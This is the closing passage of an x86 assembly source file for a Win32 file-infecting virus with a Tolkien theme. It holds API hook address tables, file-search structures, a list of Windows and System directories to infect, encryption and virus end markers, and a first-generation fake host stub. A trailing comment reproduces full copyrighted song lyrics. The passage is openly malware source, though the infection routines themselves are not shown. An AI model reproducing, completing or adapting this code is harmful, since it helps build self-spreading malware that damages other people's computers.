_GetFileAttributesA dd 00000000h
|
|||
|
_FindFirstFileA dd 00000000h
|
|||
|
_FindNextFileA dd 00000000h
|
|||
|
_GetProcAddress dd 00000000h
|
|||
|
n_HookedAPIs equ (($-@@HookedOffsetz)/4)
|
|||
|
|
|||
|
|
|||
|
@@USER32_Addresses label byte
|
|||
|
_SwapMouseButton dd 00000000h
|
|||
|
_MessageBoxA dd 00000000h
|
|||
|
_FindWindowA dd 00000000h
|
|||
|
_PostMessageA dd 00000000h
|
|||
|
|
|||
|
@@ADVAPI32_Addresses label byte
|
|||
|
_RegCreateKeyExA dd 00000000h
|
|||
|
_RegOpenKeyExA dd 00000000h
|
|||
|
_RegDeleteKeyA dd 00000000h
|
|||
|
|
|||
|
MAX_PATH equ 260
|
|||
|
|
|||
|
FILETIME STRUC
|
|||
|
FT_dwLowDateTime dd ?
|
|||
|
FT_dwHighDateTime dd ?
|
|||
|
FILETIME ENDS
|
|||
|
|
|||
|
WIN32_FIND_DATA label byte
|
|||
|
WFD_dwFileAttributes dd ?
|
|||
|
WFD_ftCreationTime FILETIME ?
|
|||
|
WFD_ftLastAccessTime FILETIME ?
|
|||
|
WFD_ftLastWriteTime FILETIME ?
|
|||
|
WFD_nFileSizeHigh dd ?
|
|||
|
WFD_nFileSizeLow dd ?
|
|||
|
WFD_dwReserved0 dd ?
|
|||
|
WFD_dwReserved1 dd ?
|
|||
|
WFD_szFileName db MAX_PATH dup (?)
|
|||
|
WFD_szAlternateFileName db 13 dup (?)
|
|||
|
db 03 dup (?)
|
|||
|
|
|||
|
_WIN32_FIND_DATA label byte
|
|||
|
_WFD_dwFileAttributes dd ?
|
|||
|
_WFD_ftCreationTime FILETIME ?
|
|||
|
_WFD_ftLastAccessTime FILETIME ?
|
|||
|
_WFD_ftLastWriteTime FILETIME ?
|
|||
|
_WFD_nFileSizeHigh dd ?
|
|||
|
_WFD_nFileSizeLow dd ?
|
|||
|
_WFD_dwReserved0 dd ?
|
|||
|
_WFD_dwReserved1 dd ?
|
|||
|
_WFD_szFileName db MAX_PATH dup (?)
|
|||
|
_WFD_szAlternateFileName db 13 dup (?)
|
|||
|
db 03 dup (?)
|
|||
|
|
|||
|
SYSTEMTIME label byte
|
|||
|
ST_wYear dw ?
|
|||
|
ST_wMonth dw ?
|
|||
|
ST_wDayOfWeek dw ?
|
|||
|
ST_wDay dw ?
|
|||
|
ST_wHour dw ?
|
|||
|
ST_wMinute dw ?
|
|||
|
ST_wSecond dw ?
|
|||
|
ST_wMilliseconds dw ?
|
|||
|
|
|||
|
|
|||
|
directories label byte
|
|||
|
|
|||
|
WindowsDir db 7Fh dup (00h)
|
|||
|
SystemDir db 7Fh dup (00h)
|
|||
|
OriginDir db 7Fh dup (00h)
|
|||
|
dirs2inf equ (($-directories)/7Fh)
|
|||
|
mirrormirror db dirs2inf
|
|||
|
|
|||
|
align dword
|
|||
|
|
|||
|
crypt_end label byte
|
|||
|
|
|||
|
virus_end label byte
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; First generation host
|
|||
|
; ===========================================================================
|
|||
|
; I'm alone. I'm with me. I'm thinking. I'm dangerous.
|
|||
|
|
|||
|
fakehost:
|
|||
|
pop dword ptr fs:[0]
|
|||
|
pop eax
|
|||
|
popad
|
|||
|
popfd
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push offset szTitle
|
|||
|
push offset szMessage
|
|||
|
push eax
|
|||
|
call MessageBoxA
|
|||
|
|
|||
|
push 00000000h
|
|||
|
call ExitProcess
|
|||
|
|
|||
|
end thorin
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Bonus Track
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; As this virus is related with Tolkien, there is also a relation with some
|
|||
|
; songs of my favourite band: Blind Guardian. And as most of you don't know
|
|||
|
; a shit about them, here i will put one song: The Bard's Song [in the fo-
|
|||
|
; rest], that is the hymn of all Blind Guardian's fans. By the way, i have to
|
|||
|
; wish them good luck, because i've heard that their vocalist had recently an
|
|||
|
; operation in his ear. Good luck, Hansi!!! We will always love you!
|
|||
|
;
|
|||
|
; Bard's Song [in the forest]
|
|||
|
; ???????????????????????????
|
|||
|
; Now you all know
|
|||
|
; The bards and their songs
|
|||
|
; When hours have gone by
|
|||
|
; I'll close my eyes
|
|||
|
; In a world far away
|
|||
|
; We may meet again
|
|||
|
; But now hear my song
|
|||
|
; About the dawn of the night
|
|||
|
; Let's sing the bards' song
|
|||
|
;
|
|||
|
; Tomorrow will take us away
|
|||
|
; Far from home
|
|||
|
; Noone will ever know our names
|
|||
|
; But the bards' song will remain
|
|||
|
; Tomorrow will take it away
|
|||
|
; The fear of today
|
|||
|
; It will be gone
|
|||
|
; Due to our magic songs
|
|||
|
;
|
|||
|
; There's only one song
|
|||
|
; Left in my mind
|
|||
|
; Tales of a brave man
|
|||
|
; Who lived far from here
|
|||
|
;
|
|||
|
; Now the bard songs are over
|
|||
|
; And it's time to leave
|
|||
|
; Noone should ask you for the name
|
|||
|
; Of the one
|
|||
|
; Who tells the story
|
|||
|
;
|
|||
|
; Tomorrow will take us away
|
|||
|
; Far from home
|
|||
|
; Noone will ever know our names
|
|||
|
; But the bards' song will remain
|
|||
|
; Tomorrow all will be known
|
|||
|
; And you are not alone
|
|||
|
; So don't be afraid
|
|||
|
; In the dark and cold
|
|||
|
; 'Cause the bards' song will remain
|
|||
|
; They all will remain
|
|||
|
;
|
|||
|
; In my thoughts and dreams
|
|||
|
; They're always in my mind
|
|||
|
; These songs from hobbits, dwarves and men
|
|||
|
; And elves
|
|||
|
; Come close your eyes
|
|||
|
; You can see them, too
|
|||
|
;
|
|||
|
; ---
|
|||
|
; Copyright (c) 1992 by Blind Guardian; "Somewhere far beyond" album.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|